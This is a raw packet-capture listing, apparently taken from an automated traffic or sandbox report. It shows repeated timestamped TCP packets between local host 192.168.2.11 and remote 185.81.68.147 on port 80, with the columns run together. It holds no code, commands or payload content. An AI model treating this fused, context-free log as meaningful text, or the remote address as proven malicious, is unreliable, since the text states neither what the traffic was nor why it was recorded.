                                                                                                                                                                                                Dec 13, 2024 08:18:56.480101109 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.480777979 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.480948925 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.480957985 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.480968952 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.480987072 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.481024027 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.481441021 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.481451988 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.481462002 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.481507063 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.481614113 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.481667042 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.482223988 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.482376099 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.482386112 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.482394934 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.482412100 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.482434034 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.483036995 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.483047962 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.483061075 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.483083963 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.483146906 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.483182907 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.484200954 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.484213114 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.484224081 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.484246969 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.484368086 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.484405041 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.484975100 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.484987020 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.484997034 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.485027075 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.485121965 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.485157967 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.485785961 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.485797882 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.485809088 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.485831976 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.485872984 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.485905886 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.486505985 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.486517906 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.486529112 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.486552000 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.486649990 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.486685038 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.487669945 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.487682104 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.487693071 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.487716913 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.487852097 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.487888098 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.488977909 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.489353895 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.489366055 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.489398003 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.489414930 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.489449024 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.491137028 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.491723061 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.491766930 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.491854906 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.492801905 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.492863894 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.493355036 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.493366957 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.493377924 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.493417978 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.493604898 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.493642092 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.494292974 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.494304895 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.494317055 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.494350910 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.494441986 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.494478941 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.495090008 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.495100975 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.495110989 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.495150089 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.495222092 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.495277882 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.495887995 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.496037006 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.496047974 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.496057987 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.496087074 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.496126890 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.496815920 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.496947050 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.496983051 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.497215033 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.497226954 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.497237921 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.497248888 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.497257948 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.497261047 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.497268915 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.497279882 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.497287989 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.497292042 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.497303963 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.497304916 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.497317076 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.497339964 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.497351885 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.497361898 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.497378111 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.497380018 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.497404099 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.497539997 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.497606993 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.498121977 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.498261929 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.498307943 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.498393059 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.498408079 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.498457909 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.498934031 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.498948097 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.498958111 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.498969078 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.498986006 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.499036074 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.499084949 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.499095917 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.499104977 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.499115944 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.499140978 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.499165058 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.499690056 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.499701977 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.499713898 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.499730110 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.499739885 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.499747992 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.499782085 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.499798059 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.499818087 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.499841928 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.499852896 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.499886990 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.500720024 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.500735998 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.500778913 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.500894070 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.500905037 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.500958920 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.501498938 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.501766920 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.501777887 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.501789093 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.501811028 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.501871109 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.502194881 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.502355099 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.502366066 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.502396107 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.502491951 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.502542019 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.503007889 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.503142118 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.503153086 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.503180981 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.503302097 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.503360987 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.503926992 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.504076958 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.504086971 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.504098892 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.504117966 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.504153013 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.504898071 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.504914045 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.504925013 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.504936934 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.504956961 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.504993916 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.505572081 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.505582094 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.505594015 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.505637884 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.505853891 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.505916119 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.506366968 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.506377935 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.506388903 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.506417990 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.506508112 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.506576061 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.507390022 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.507400036 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.507411003 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.507467985 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.507544994 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.507607937 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.508188963 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.508265972 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.508275986 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.508285999 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.508301973 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.508342981 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.509413004 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.509474039 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.509485006 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.509511948 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.509572029 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.509624958 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.511657953 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.511810064 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.511820078 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.511832952 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.511914015 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.512469053 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.512495995 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.512506008 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.512516975 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.512531996 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.512554884 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.513044119 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.513194084 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.513205051 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.513235092 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.513375998 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.513434887 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.514353991 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.514365911 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.514377117 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.514425993 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.514501095 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.514552116 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.518402100 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.518414974 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.518424034 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.518435001 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.518491030 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.519433975 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.519444942 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.519457102 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.519489050 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.519583941 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.519754887 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.520076990 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.520225048 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.520241022 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.520251036 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.520261049 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.520272017 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.520282030 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.520293951 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.520306110 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.520315886 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.520325899 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.520335913 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.520366907 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.520394087 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.521224022 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.521272898 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.521284103 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.521359921 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.521393061 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.521461010 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.525542974 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.525554895 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.525566101 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.525574923 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.525585890 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.525600910 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.525651932 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.525703907 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.525713921 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.525721073 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.525753021 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.525798082 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.526325941 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.526335955 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.526346922 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.526381016 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.526462078 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.526514053 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.527476072 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.527650118 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.527661085 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.527671099 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.527693033 CET4972680192.168.2.11185.81.68.147
